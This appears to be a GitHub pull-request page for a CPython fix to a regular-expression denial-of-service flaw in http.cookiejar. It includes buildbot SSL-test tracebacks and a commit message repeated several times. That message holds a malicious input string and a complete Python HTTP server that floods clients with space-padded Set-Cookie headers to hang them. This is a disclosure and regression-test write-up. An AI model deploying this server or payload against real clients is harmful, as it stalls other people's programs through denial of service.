  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
rror: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 35632)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
k


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
k

@bedevere-bot
Copy link

⚠️⚠️⚠️ Buildbot failure ⚠️⚠️⚠️

Hi! The buildbot AMD64 FreeBSD Shared 2.7 has failed when building commit e649903.

What do you need to do:

  1. Don't panic.
  2. Check the buildbot page in the devguide if you don't know what the buildbots are or how they work.
  3. Go to the page of the buildbot that failed (https://buildbot.python.org/all/#builders/366/builds/9) and take a look at the build logs.
  4. Check if the failure is related to this commit (e649903) or if it is a false positive.
  5. If the failure is related to this commit, please, reflect that on the issue and make a new Pull Request with a fix.

You can take a look at the buildbot page here:

https://buildbot.python.org/all/#builders/366/builds/9

Failed tests:

  • test_ssl

Failed subtests:

  • test_load_cert_chain - test.test_ssl.ContextTests

Summary of the results of the build (if available):

== Tests result: FAILURE then FAILURE ==

368 tests OK.

10 slowest tests:

  • test_lib2to3: 258.7s
  • test_io: 234.9s
  • test_tokenize: 181.0s
  • test_regrtest: 167.1s
  • test_decimal: 142.4s
  • test_itertools: 134.2s
  • test_subprocess: 115.7s
  • test_weakref: 63.0s
  • test_asyncore: 52.0s
  • test_multibytecodec: 46.3s

1 test failed:
test_ssl

35 tests skipped:
test_aepack test_al test_applesingle test_bsddb test_bsddb3
test_cd test_cl test_dl test_epoll test_gdb test_gdbm test_gl
test_idle test_imageop test_imgfile test_ioctl test_linuxaudiodev
test_macos test_macostools test_msilib test_ossaudiodev
test_pep277 test_scriptpackages test_spwd test_startfile
test_sunaudiodev test_tcl test_tk test_ttk_guionly
test_ttk_textonly test_turtle test_unicode_file test_winreg
test_winsound test_zipfile64
Ask someone to teach regrtest.py about which tests are
xpected to get skipped on freebsd13.

1 re-run test:
test_ssl

Total duration: 14 min 13 sec

Click to see traceback logs
Traceback (most recent call last):
  File "<string>", line 1, in <module>
  File "/usr/local/lib/python2.7/test/test_support.py", line 2, in <module>
    import test.support
  File "/usr/local/lib/python2.7/test/support/__init__.py", line 6, in <module>
    import contextlib
  File "/usr/local/lib/python2.7/contextlib.py", line 4, in <module>
    from functools import wraps
  File "/usr/local/lib/python2.7/functools.py", line 10, in <module>
    from _functools import partial, reduce
ImportError: /usr/local/lib/python2.7/lib-dynload/_functools.so: Undefined symbol "Py_InitModule4_64"


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2402, in test_protocol_sslv23
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1810, in run
    msg = self.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1787, in read
    return self.sslconn.read()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 641, in read
    v = self._sslobj.read(len)
rror: [Errno 54] Connection reset by peer


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: TLSV1_ALERT_UNKNOWN_CA] tlsv1 alert unknown ca (_ssl.c:727)
 server:  new connection from ('127.0.0.1', 58881)
 server: connection cipher is now ('ECDHE-RSA-AES256-SHA', 'TLSv1.0', 256)
 server: selected protocol is now None
k


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 920, in test_load_cert_chain
    ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
SSLError: [SSL] PEM lib (_ssl.c:2834)


Traceback (most recent call last):
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 189, in f
    return func(*args, **kwargs)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2477, in test_protocol_tlsv1_1
    try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2134, in try_protocol_combo
    chatty=False, connectionchatty=False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 2062, in server_params_test
    s.connect((HOST, server.port))
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 864, in connect
    self._real_connect(addr, False)
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 855, in _real_connect
    self.do_handshake()
  File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
SSLError: [SSL: TLSV1_ALERT_PROTOCOL_VERSION] tlsv1 alert protocol version (_ssl.c:727)


Traceback (most recent call last):
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/test/test_ssl.py", line 1730, in wrap_conn
    self.sock, server_side=True)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 369, in wrap_socket
    _context=self)
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 599, in __init__
    self.do_handshake()
   File "/usr/home/buildbot/python/2.7.koobs-freebsd-564d/build/Lib/ssl.py", line 828, in do_handshake
    self._sslobj.do_handshake()
 SSLError: [SSL: NO_SHARED_CIPHER] no shared cipher (_ssl.c:727)
k

jacobneiltaylor pushed a commit to jacobneiltaylor/cpython that referenced this pull request Dec 5, 2019
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
shihai1991 pushed a commit to shihai1991/cpython that referenced this pull request Jan 31, 2020
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
larryhastings pushed a commit that referenced this pull request Apr 3, 2020
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.

(cherry picked from commit 1b779bf)

Co-authored-by: bcaller <bcaller@users.noreply.github.com>
wshanks added a commit to wshanks/python-future that referenced this pull request Dec 23, 2022
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS). The regex contained multiple
overlapping \s* capture groups. A long sequence of spaces can trigger
bad performance.

See python/cpython#17157 and https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
type-security A security issue
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

7 participants